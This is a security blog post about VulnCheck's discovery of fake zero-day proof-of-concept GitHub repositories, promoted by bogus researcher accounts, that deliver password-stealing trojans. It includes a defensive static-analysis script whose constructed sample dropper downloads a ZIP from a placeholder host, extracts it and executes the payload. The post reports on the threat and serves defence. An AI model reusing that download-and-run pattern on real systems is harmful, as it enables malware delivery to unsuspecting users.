Project Hyphae

GitHub for Zero-Day Malware Distribution


Threat actors posing as security professionals have been using GitHub to distribute malware to unsuspecting victims. Security firm VulnCheck has identified GitHub repositories that appear to contain proof-of-concept code for zero-day exploits in popular software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. Instead, they download a Python script named which is simply a downloader for Linux and Windows systems. The script downloads a ZIP file from the internet based on the installed OS, extracts it, and executes the payload. The Windows payload has a high detection rate (36/61) on VirusTotal as a password-stealing trojan, while the Linux payload was initially flagged by only three scanners (now flagged by 24/61). Both the Linux and Windows ZIP files contain a Tor client as part of their install.
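A defender's static triage for the download, extract and execute pattern described above, as an added example that is not from VulnCheck or the original post: it parses a Python file from a cloned "PoC" repository without executing it and flags files that combine all three steps. The capability map, the result labels and both sample scripts are assumptions constructed for illustration.

```python
import ast

# Heuristic capability map: an assumption of this example, not VulnCheck's logic.
MODULE_CAPS = {"urllib": "download", "requests": "download", "zipfile": "extract",
               "subprocess": "execute", "platform": "os_check"}
# module.attribute uses that imply a capability without a telltale import
ATTR_CAPS = {("os", "system"): "execute", ("os", "popen"): "execute",
             ("os", "startfile"): "execute", ("shutil", "unpack_archive"): "extract",
             ("os", "name"): "os_check", ("sys", "platform"): "os_check"}
DROPPER_CHAIN = {"download", "extract", "execute"}

def capabilities(source):
    """Parse (never execute) Python source; return the capabilities it references."""
    caps = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                caps.add(MODULE_CAPS.get(alias.name.split(".")[0]))
        elif isinstance(node, ast.ImportFrom) and node.module:
            caps.add(MODULE_CAPS.get(node.module.split(".")[0]))
            for alias in node.names:  # e.g. "from os import system"
                caps.add(ATTR_CAPS.get((node.module, alias.name)))
        elif isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
            caps.add(ATTR_CAPS.get((node.value.id, node.attr)))
    caps.discard(None)
    return caps

def triage(source):
    """Flag a file only when it holds the whole download/extract/execute chain."""
    caps = capabilities(source)
    if not DROPPER_CHAIN <= caps:
        return "no-dropper-chain"
    return "dropper-os-specific" if "os_check" in caps else "dropper"

# Constructed samples, not taken from the real repositories; the URL is a placeholder.
SAMPLE_FAKE_POC = '''
import platform, zipfile, subprocess
from urllib.request import urlretrieve
name = "win.zip" if platform.system() == "Windows" else "linux.zip"
urlretrieve("https://example.invalid/" + name, name)
zipfile.ZipFile(name).extractall("out")
subprocess.Popen(["out/payload"])
'''
SAMPLE_BENIGN = 'import socket\nsocket.create_connection(("127.0.0.1", 8080))\n'

if __name__ == "__main__":
    for label, src in (("fake_poc", SAMPLE_FAKE_POC), ("benign", SAMPLE_BENIGN)):
        print(label, triage(src), sorted(capabilities(src)))
```

A hit is a reason to read the file in an isolated environment before running anything from the repository; aliased imports and obfuscated code will evade this heuristic.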

The threat actors, in an attempt to gain traffic to their GitHub repositories, have created Twitter accounts for fake employees of the fictitious cyber security firm High Sierra Cyber Security. These accounts appear legitimate, with security news posts, followers, and even headshots stolen from real security researchers at well-known security firms. They then post about the new zero-day they claim to have discovered and direct the reader to download the proof-of-concept from GitHub.

While the effectiveness of using Twitter and GitHub to persuade victims to download malware isn’t clear yet, there are indicators that the threat actors are having some success. When VulnCheck reported the malicious nature of the repositories to GitHub and got them taken down, the threat actors quickly set up new repositories and began directing their Twitter readers to them.

VulnCheck’s blog post of their findings:

Bleeping Computer article about VulnCheck’s findings:

VirusTotal report for Windows payload:

VirusTotal report for Linux payload:
